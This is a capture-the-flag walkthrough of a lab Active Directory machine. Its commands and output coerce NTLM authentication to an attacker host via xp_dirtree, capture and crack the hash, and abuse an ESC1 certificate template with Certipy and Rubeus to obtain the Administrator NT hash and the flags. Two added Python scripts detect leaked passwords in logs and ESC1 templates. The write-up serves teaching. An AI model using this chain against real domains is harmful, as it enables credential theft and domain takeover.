Escape

Medium machine, Mar 13, 2026
10.10.11.202
#nmap #john #smbclient #msf #responder #certipy #Rubeus #Shares #NTLM #Captured #SQL_SVC #installation #Obtaining #Abusing

[+] 10.10.11.202:445 is running Windows 10.0 Build 17763 (name:DC) (domain:sequel)

nmap


john

john hash --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8  
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])  
Will run 12 OpenMP threads  
Press 'q' or Ctrl-C to abort, almost any other key for status  
REGGIE1234ronnie (sql_svc)  
1g 0:00:00:02 DONE (2023-03-02 07:08) 0.4566g/s 4887Kp/s 4887Kc/s 4887KC/s RICANNENA1..RBDesloMEJOR  
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably  
Session completed

Once again john takes the cake and gives us the password: REGGIE1234ronnie


smbclient

Shares

smbclient -N -L //dc.sequel.htb  
  
       Sharename       Type      Comment  
       ---------       ----      -------  
       ADMIN$          Disk      Remote Admin  
       C$              Disk      Default share  
       IPC$            IPC       Remote IPC  
       NETLOGON        Disk      Logon server share    
       Public          Disk         
       SYSVOL          Disk      Logon server share

Public

smbclient -N //dc.sequel.htb/Public  
Try "help" to get a list of possible commands.  
smb: \> ls  
 .                                   D        0  Sat Nov 19 05:51:25 2022  
 ..                                  D        0  Sat Nov 19 05:51:25 2022  
 SQL Server Procedures.pdf           A    49551  Fri Nov 18 07:39:43 2022  
  
               5184255 blocks of size 4096. 1317713 blocks available

msf

Attempt to Enumerate User Accounts

auxiliary(admin/mssql/mssql_enum_sql_logins) >> run  
[*] Running module against 10.10.11.202  
  
[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...  
[+] 10.10.11.202:1433 - Connected.  
[*] 10.10.11.202:1433 - Checking if PublicUser has the sysadmin role...  
[*] 10.10.11.202:1433 - PublicUser is NOT a sysadmin.  
[*] 10.10.11.202:1433 - Setup to fuzz 300 SQL Server logins.  
[*] 10.10.11.202:1433 - Enumerating logins...  
[+] 10.10.11.202:1433 - 36 initial SQL Server logins were found.  
[*] 10.10.11.202:1433 - Verifying the SQL Server logins...  
[+] 10.10.11.202:1433 - 17 SQL Server logins were verified:  
[*] 10.10.11.202:1433 -  - ##MS_AgentSigningCertificate##  
[*] 10.10.11.202:1433 -  - ##MS_PolicyEventProcessingLogin##  
[*] 10.10.11.202:1433 -  - ##MS_PolicySigningCertificate##  
[*] 10.10.11.202:1433 -  - ##MS_PolicyTsqlExecutionLogin##  
[*] 10.10.11.202:1433 -  - ##MS_SQLAuthenticatorCertificate##  
[*] 10.10.11.202:1433 -  - ##MS_SQLReplicationSigningCertificate##  
[*] 10.10.11.202:1433 -  - ##MS_SQLResourceSigningCertificate##  
[*] 10.10.11.202:1433 -  - ##MS_SmoExtendedSigningCertificate##  
[*] 10.10.11.202:1433 -  - BUILTIN\Users  
[*] 10.10.11.202:1433 -  - NT AUTHORITY\SYSTEM  
[*] 10.10.11.202:1433 -  - NT SERVICE\SQLTELEMETRY$SQLMOCK  
[*] 10.10.11.202:1433 -  - NT SERVICE\SQLWriter  
[*] 10.10.11.202:1433 -  - NT SERVICE\Winmgmt  
[*] 10.10.11.202:1433 -  - NT Service\MSSQL$SQLMOCK  
[*] 10.10.11.202:1433 -  - PublicUser  
[*] 10.10.11.202:1433 -  - sa  
[*] 10.10.11.202:1433 -  - sequel\Administrator  
[*] Auxiliary module execution completed

NTLM Stealer

[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_ntlm_stealer) >> options  
  
Module options (auxiliary/admin/mssql/mssql_ntlm_stealer):  
  
  Name                 Current Setting      Required  Description  
  ----                 ---------------      --------  -----------  
  PASSWORD             GuestUserCantWrite1  no        The password for the specified username  
  RHOSTS               10.10.11.202         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html  
  RPORT                1433                 yes       The target port (TCP)  
  SMBPROXY             10.10.14.58          yes       IP of SMB proxy or sniffer.  
  TDSENCRYPTION        false                yes       Use TLS/SSL for TDS data "Force Encryption"  
  THREADS              1                    yes       The number of concurrent threads (max one per host)  
  USERNAME             PublicUser           no        The username to authenticate as  
  USE_WINDOWS_AUTHENT  false                yes       Use windows authentification (requires DOMAIN option set)  
  
  
View the full module info with the info, or info -d command.  
  
[msf](Jobs:0 Agents:0) auxiliary(admin/mssql/mssql_ntlm_stealer) >> run  
  
[*] 10.10.11.202:1433     - DONT FORGET to run a SMB capture or relay module!  
[*] 10.10.11.202:1433     - Forcing SQL Server at 10.10.11.202 to auth to 10.10.14.58 via xp_dirtree...  
[+] 10.10.11.202:1433     - Successfully executed xp_dirtree on 10.10.11.202  
[+] 10.10.11.202:1433     - Go check your SMB relay or capture module for goodies!  
[*] 10.10.11.202:1433     - Scanned 1 of 1 hosts (100% complete)  
[*] Auxiliary module execution completed

Notice that SMBPROXY is set to the tun0 address assigned over the VPN (10.10.14.58). That is the host the SQL Server will be coerced into authenticating to over SMB, so Responder has to be listening on that interface before the module runs.

SQL_SVC login verification

[+] 10.10.11.202:1433     - 10.10.11.202:1433 - Login Successful: WORKSTATION\sql_svc:REGGIE1234ronnie

responder

Captured SQL_SVC hash

[+] Listening for events...  
  
[SMB] NTLMv2-SSP Client   : 10.10.11.202  
[SMB] NTLMv2-SSP Username : sequel\sql_svc  
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:fe34fcb99683427b:89BE8E0D436B07B97EF98CBA7FC5E3B7:010100000000000000C0680D884DD9012C9D3F6CAED7D5C700000000020008004B0050004A004B0001001E00570049004E002D0042004D0056004600380058004600390035004E004E0004003400570049004E002D0042004D0056004600380058004600390035004E004E002E004B0050004A004B002E004C004F00430041004C00030014004B0050004A004B002E004C004F00430041004C00050014004B0050004A004B002E004C004F00430041004C000700080000C0680D884DD901060004000200000008003000300000000000000000000000003000006CF6096E33F2B513B70F863914ED0780C6FC4A6F837C90D759EB427D0993FF280A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350038000000000000000000

certipy

Obtaining Certificate Information

First we download the certificate

certipy find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -dc-ip ${TARGET_IP}  
Certipy v4.3.0 - by Oliver Lyak (ly4k)  
  
[*] Finding certificate templates  
[*] Found 34 certificate templates  
[*] Finding certificate authorities  
[*] Found 1 certificate authority  
[*] Found 12 enabled certificate templates  
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA  
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.  
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP  
[!] Failed to connect to remote registry. Service should be starting now. Trying again...  
[*] Got CA configuration for 'sequel-DC-CA'  
[*] Saved BloodHound data to '20230303044620_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k  
[*] Saved text output to '20230303044620_Certipy.txt'  
[*] Saved JSON output to '20230303044620_Certipy.json'

Then we look at 20230303044620_Certipy.json

"Certificate Authorities": {  
   "0": {  
     "CA Name": "sequel-DC-CA",  
     "DNS Name": "dc.sequel.htb",  
     "Certificate Subject": "CN=sequel-DC-CA, DC=sequel, DC=htb",  
     "Certificate Serial Number": "1EF2FA9A7E6EADAD4F5382F4CE283101",  
     "Certificate Validity Start": "2022-11-18 20:58:46+00:00",  
     "Certificate Validity End": "2121-11-18 21:08:46+00:00",  
     "Web Enrollment": "Disabled",  
     "User Specified SAN": "Disabled",  
     "Request Disposition": "Issue",  
     "Enforce Encryption for Requests": "Enabled",  
     "Permissions": { 
       "Owner": "SEQUEL.HTB\\Administrators",  
       "Access Rights": {  
         "2": [  
           "SEQUEL.HTB\\Administrators",  
           "SEQUEL.HTB\\Domain Admins",  
           "SEQUEL.HTB\\Enterprise Admins"  
         ],  
         "1": [  
           "SEQUEL.HTB\\Administrators",  
           "SEQUEL.HTB\\Domain Admins",  
           "SEQUEL.HTB\\Enterprise Admins"  
         ],  
         "512": [  
           "SEQUEL.HTB\\Authenticated Users"  
         ]  
       }  
     }  
   }  
 },
"Certificate Templates": {  
   "0": {  
     "Template Name": "UserAuthentication",  
     "Display Name": "UserAuthentication",  
     "Certificate Authorities": [  
       "sequel-DC-CA"  
     ],  
     "Enabled": true,  
     "Client Authentication": true,  
     "Enrollment Agent": false,  
     "Any Purpose": false,  
     "Enrollee Supplies Subject": true,  
     "Certificate Name Flag": [  
       "EnrolleeSuppliesSubject"  
     ],  
     "Enrollment Flag": [  
       "PublishToDs",  
       "IncludeSymmetricAlgorithms"  
     ],  
     "Private Key Flag": [  
       "16777216",  
       "65536",  
       "ExportableKey"  
     ],  
     "Extended Key Usage": [  
       "Client Authentication",  
       "Secure Email",  
       "Encrypting File System"  
     ],  
     "Requires Manager Approval": false,  
     "Requires Key Archival": false,  
     "Authorized Signatures Required": 0,  
     "Validity Period": "10 years",  
     "Renewal Period": "6 weeks",  
     "Minimum RSA Key Length": 2048,  
     "Permissions": {  
       "Enrollment Permissions": {  
         "Enrollment Rights": [  
           "SEQUEL.HTB\\Domain Admins",  
           "SEQUEL.HTB\\Domain Users",  
           "SEQUEL.HTB\\Enterprise Admins"  
         ]  
       },  
       "Object Control Permissions": {  
         "Owner": "SEQUEL.HTB\\Administrator",  
         "Write Owner Principals": [  
           "SEQUEL.HTB\\Domain Admins",  
           "SEQUEL.HTB\\Enterprise Admins",  
           "SEQUEL.HTB\\Administrator"  
         ],  
         "Write Dacl Principals": [  
           "SEQUEL.HTB\\Domain Admins",  
           "SEQUEL.HTB\\Enterprise Admins",  
           "SEQUEL.HTB\\Administrator"  
         ],  
         "Write Property Principals": [  
           "SEQUEL.HTB\\Domain Admins",  
           "SEQUEL.HTB\\Enterprise Admins",  
           "SEQUEL.HTB\\Administrator"  
         ]  
       }  
     },

We see our exploit vector. The UserAuthentication template is enabled, carries the Client Authentication EKU ("Client Authentication": true), lets the requester choose the subject ("Enrollee Supplies Subject": true), requires no manager approval and no authorized signatures, and grants enrollment rights to Domain Users. Together those are the ESC1 conditions: any domain user can request a logon certificate carrying a UPN of their choosing.

Obtaining LDAP Certificate for Authenticated User

certipy req -username Ryan.Cooper@sequel.htb -password NuclearMosquito3 -ca sequel-DC-CA -target dc.sequel.htb -template User  
Certipy v4.3.0 - by Oliver Lyak (ly4k)  
  
[*] Requesting certificate via RPC  
[*] Successfully requested certificate  
[*] Request ID is 53  
[*] Got certificate with UPN 'Ryan.Cooper@sequel.htb'  
[*] Certificate has no object SID  
[*] Saved certificate and private key to 'ryan.cooper.pfx'

Abusing UserAuthentication to get Administrator Cert

certipy req -username Ryan.Cooper@sequel.htb -password NuclearMosquito3 -ca sequel-DC-CA -target dc.sequel.htb -template UserAuthentication -upn administrator@sequel.htb  
Certipy v4.3.0 - by Oliver Lyak (ly4k)  
  
[*] Requesting certificate via RPC  
[*] Successfully requested certificate  
[*] Request ID is 54  
[*] Got certificate with UPN 'administrator@sequel.htb'  
[*] Certificate has no object SID  
[*] Saved certificate and private key to 'administrator.pfx'

Obtaining Administrator NTLM Hash

certipy auth -pfx administrator.pfx -dc-ip ${TARGET_IP} -domain sequel.htb 
Certipy v4.3.0 - by Oliver Lyak (ly4k) 
[*] Using principal: administrator@sequel.htb  
[*] Trying to get TGT...  
[*] Got TGT  
[*] Saved credential cache to 'administrator.ccache'  
[*] Trying to retrieve NT hash for 'administrator'  
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
# The NT hash is the second half of the LM:NT pair (the first half is the empty LM hash); that is the pass-the-hash value: a52f78e4c751e5f5e17e1e9f3e58f4ee

Rubeus

Obtaining NTLM Hash from pfx certificate

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./Rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /getcredentials  
  
  ______        _  
 (_____ \      | |  
  _____) )_   _| |__  _____ _   _  ___  
 |  __  /| | | |  _ \| ___ | | | |/___)  
 | |  \ \| |_| | |_) ) ____| |_| |___ |  
 |_|   |_|____/|____/|_____)____/(___/  
  
 v2.2.0  
  
[*] Action: Ask TGT  
  
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.cooper  
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'  
[*] Using domain controller: fe80::c5ba:e362:eb94:f597%4:88  
[+] TGT request successful!  
[*] base64(ticket.kirbi):  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  
  
 ServiceName              :  krbtgt/sequel.htb  
 ServiceRealm             :  SEQUEL.HTB  
 UserName                 :  Administrator  
 UserRealm                :  SEQUEL.HTB  
 StartTime                :  3/3/2023 1:47:40 AM  
 EndTime                  :  3/3/2023 11:47:40 AM  
 RenewTill                :  3/10/2023 1:47:40 AM  
 Flags                    :  name_canonicalize, pre_authent, initial, renewable  
 KeyType                  :  rc4_hmac  
 Base64(key)              :  RjUoBusO0Tj4530LOVWOAQ==  
 ASREP (key)              :  63B8C27D87A427901F6289639D1689A6
 [*] Getting credentials using U2U  
  
 CredentialInfo         :  
   Version              : 0  
   EncryptionType       : rc4_hmac  
   CredentialData       :  
     CredentialCount    : 1  
      NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

Foothold

Checking the Shares

I downloaded SQL Server Procedures.pdf from the Public share and found credentials in it for a guest user that can authenticate to MSSQL:

username: PublicUser, password: GuestUserCantWrite1


Obtaining NTLM hash

Port 1433 is open to authenticate against, so I went into msf, did some exploring and found the mssql_ntlm_stealer aux module. It calls xp_dirtree with a UNC path pointing at our host, which makes the SQL Server service account reach out over SMB and authenticate to us; that is why the captured NetNTLMv2 belongs to sql_svc rather than to PublicUser. First I want to make sure I'm ready to capture the login attempt:

sudo responder -I tun0  

Then we execute the NTLM_STEALER module.

We see the Captured hash


Cracking the NetNTLMv2 hash

We save that into escape/hash and pass it to john, which auto-detects the netntlmv2 format. A NetNTLMv2 capture is a challenge-response, not the NT hash itself, so it cannot be passed directly; it has to be cracked (or relayed) before it is useful.


Logging in as SQL_SVC


Log in with evil-winrm

Obtaining User Flag

We located a log file that we can read

   Directory: C:\SQLServer\Logs  
Mode                LastWriteTime         Length Name  
----                -------------         ------ ----  
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

Right away we can notice two failed login attempts from localhost, logged back to back:

Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]  
Error: 18456, Severity: 14, State: 8.  
Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
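The tell in those two lines is a failed logon for a real account followed, from the same client, by a failed logon whose "user" is not an account name at all. The following added example (not from the write-up) turns that observation into a scan over a SQL Server ERRORLOG: it parses 18456 failures and flags a non-account-looking username that directly follows an account failure from the same client within a short window. The log excerpt is constructed in the real file's layout (timestamps, CLIENT addresses and the 'sa' lines are made up; the two 127.0.0.1 messages are the ones above); the known_logins allowlist is a hypothetical parameter to stop short SQL login names like sa from being treated as leaked passwords.

```python
"""Find passwords typed into the username field in a SQL Server ERRORLOG (added example)."""
import re
from datetime import datetime, timedelta

FAILED_LOGON = re.compile(
    r"^(?:(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+)?"
    r"Logon failed for user '(?P<user>[^']*)'\..*?\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failures(log_text: str) -> list:
    """Return (timestamp or None, user, client) for each 'Logon failed' line."""
    events = []
    for raw in log_text.splitlines():
        m = FAILED_LOGON.match(raw.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S") if m["ts"] else None
            events.append((ts, m["user"], m["client"]))
    return events


def looks_like_account(name: str, known_logins) -> bool:
    # DOMAIN\user, user@domain, or a SQL login we already know exists.
    return "\\" in name or "@" in name or name.lower() in {k.lower() for k in known_logins}


def find_password_in_username(log_text: str, known_logins=("sa", "PublicUser"),
                              window: timedelta = timedelta(minutes=5)) -> list:
    """Return (account, probable_password, client) for each suspicious pair of failures."""
    hits, prev = [], None
    for ts, user, client in parse_failures(log_text):
        if (prev is not None
                and looks_like_account(prev[1], known_logins)
                and not looks_like_account(user, known_logins)
                and prev[2] == client
                and (ts is None or prev[0] is None or ts - prev[0] <= window)):
            hits.append((prev[1], user, client))
        prev = (ts, user, client)
    return hits


# Constructed ERRORLOG excerpt (timestamps and the 'sa' lines are made up).
SAMPLE_LOG = """\
2023-02-07 08:06:04.02 Logon       Error: 18456, Severity: 14, State: 8.
2023-02-07 08:06:04.02 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2023-02-07 08:06:15.93 Logon       Error: 18456, Severity: 14, State: 8.
2023-02-07 08:06:15.93 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2023-02-07 08:07:40.55 Logon       Error: 18456, Severity: 14, State: 8.
2023-02-07 08:07:40.55 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.58]
"""

if __name__ == "__main__":
    for account, secret, client in find_password_in_username(SAMPLE_LOG):
        print(f"possible credential leak from {client}: {account} / {secret}")
```

The same heuristic applies to any logon log that records the supplied user name verbatim (Windows 4625, sshd, web app auth logs); the allowlist and the time window are what keep it from flagging every typo.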

The second 'user' is not an account at all: it is the password that was typed into the username field. Pairing it with the preceding failure gives Ryan.Cooper:NuclearMosquito3, and just like that we're in as the user Ryan.Cooper.

evil-winrm -i ${TARGET_IP} -u 'Ryan.Cooper' -p 'NuclearMosquito3'  
  
Evil-WinRM shell v3.4  
  
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine  
  
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion  
  
Info: Establishing connection to remote endpoint  
  
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cat ../Desktop/user.txt  
6b2202c196b4e8a0c231d2e1d532f45b  
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>

Root Escalation

DISCLAIMER I don't feel bad about it, but I definitely wouldn't have figured this out on my own with prior knowledge. The guide I pulled this information from is linked in the header of this document https://www-ired-team.translate.goog/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en

TBH the tools mentioned in this guide above were difficult to obtain in some cases and impossible in others. DOTNET-sdk-4.0 could not be found.

However, I found this https://github.com/ly4k/Certipy installation instead

Identify Escalation Vector

This informs us that we're able to request a certificate for a separate account: because the UserAuthentication template lets the enrollee supply the subject, the UPN in the request is not tied to the authenticating user, and the resulting certificate is still valid for client authentication.
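Reading the conditions off the Certipy JSON by hand (as done in the certipy section above and summarised here) is error-prone across 34 templates, so here is an added example, not code from the write-up or from Certipy, that applies the ESC1 checklist to a `certipy find` JSON report: enabled, usable for client authentication, enrollee supplies subject, no manager approval, no required signatures, and enrollment rights granted to a low-privileged group. The sample report is constructed: entry "0" mirrors the UserAuthentication template shown above, the other entries are made-up near-misses.

```python
"""Triage a certipy find JSON report for ESC1-shaped templates (added example)."""
import json

# Group names (after the DOMAIN\ prefix) that effectively mean "anyone in the domain".
LOW_PRIV = {"domain users", "authenticated users", "domain computers", "everyone", "users"}
# EKUs that let the certificate log a user on.
AUTH_EKUS = {"Client Authentication", "Smart Card Logon", "PKINIT Client Authentication", "Any Purpose"}


def low_priv_enrollers(template: dict) -> list:
    rights = (template.get("Permissions", {})
              .get("Enrollment Permissions", {})
              .get("Enrollment Rights", []))
    return [p for p in rights if p.split("\\")[-1].lower() in LOW_PRIV]


def auth_capable(template: dict) -> bool:
    ekus = set(template.get("Extended Key Usage", []))
    # Certipy already folds the EKUs into "Client Authentication"; the EKU check and the
    # empty-EKU case (valid for any purpose) cover reports that only list EKUs.
    return bool(template.get("Client Authentication") or template.get("Any Purpose")
                or ekus & AUTH_EKUS or not ekus)


def is_esc1(template: dict) -> bool:
    return (bool(template.get("Enabled"))
            and auth_capable(template)
            and bool(template.get("Enrollee Supplies Subject"))
            and not template.get("Requires Manager Approval", False)
            and int(template.get("Authorized Signatures Required", 0)) == 0
            and bool(low_priv_enrollers(template)))


def find_esc1(report: dict) -> list:
    """Return (template name, low-priv enrollers, issuing CAs) for every ESC1 candidate."""
    hits = []
    for tmpl in report.get("Certificate Templates", {}).values():
        if is_esc1(tmpl):
            hits.append((tmpl["Template Name"], low_priv_enrollers(tmpl),
                         tmpl.get("Certificate Authorities", [])))
    return hits


def find_esc1_in_file(path: str) -> list:
    with open(path, encoding="utf-8") as fh:
        return find_esc1(json.load(fh))


def _tmpl(name, supplies_subject, approval=False, rights=("SEQUEL.HTB\\Domain Users",)):
    """Build a constructed template entry in certipy's key layout."""
    return {
        "Template Name": name, "Enabled": True, "Client Authentication": True, "Any Purpose": False,
        "Enrollee Supplies Subject": supplies_subject,
        "Extended Key Usage": ["Client Authentication", "Secure Email", "Encrypting File System"],
        "Requires Manager Approval": approval, "Authorized Signatures Required": 0,
        "Certificate Authorities": ["sequel-DC-CA"],
        "Permissions": {"Enrollment Permissions": {"Enrollment Rights": list(rights)}},
    }


# Constructed report: "0" mirrors the write-up's UserAuthentication template; the rest are made up.
SAMPLE_REPORT = {"Certificate Templates": {
    "0": _tmpl("UserAuthentication", True,
               rights=("SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Domain Users", "SEQUEL.HTB\\Enterprise Admins")),
    "1": _tmpl("User", False),                        # subject built from AD, UPN cannot be chosen
    "2": _tmpl("ApprovedAuth", True, approval=True),  # arbitrary UPN, but a CA manager must approve
    "3": _tmpl("AdminOnly", True, rights=("SEQUEL.HTB\\Domain Admins",)),  # only admins can enroll
}}

if __name__ == "__main__":
    for name, who, cas in find_esc1(SAMPLE_REPORT):
        print(f"ESC1: {name} on {', '.join(cas)} enrollable by {', '.join(who)}")
```

Certipy itself performs this classification with `certipy find -vulnerable`; the point of the script is to make the exact conditions explicit and to show that removing any one of them (fixed subject, manager approval, admin-only enrollment) takes a template out of ESC1.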


Creating CN=Administrator Certificate

If you'd like to know how to obtain a certificate for your account login see Obtaining LDAP Certificate for Authenticated User

Obtain Root Flag


Variant on Obtaining Administrator NTLM

Rubeus

Flags

User Flag

6b2202c196b4e8a0c231d2e1d532f45b

Root Flag

5aa9695a1e9ff76ef73af020e90fb7db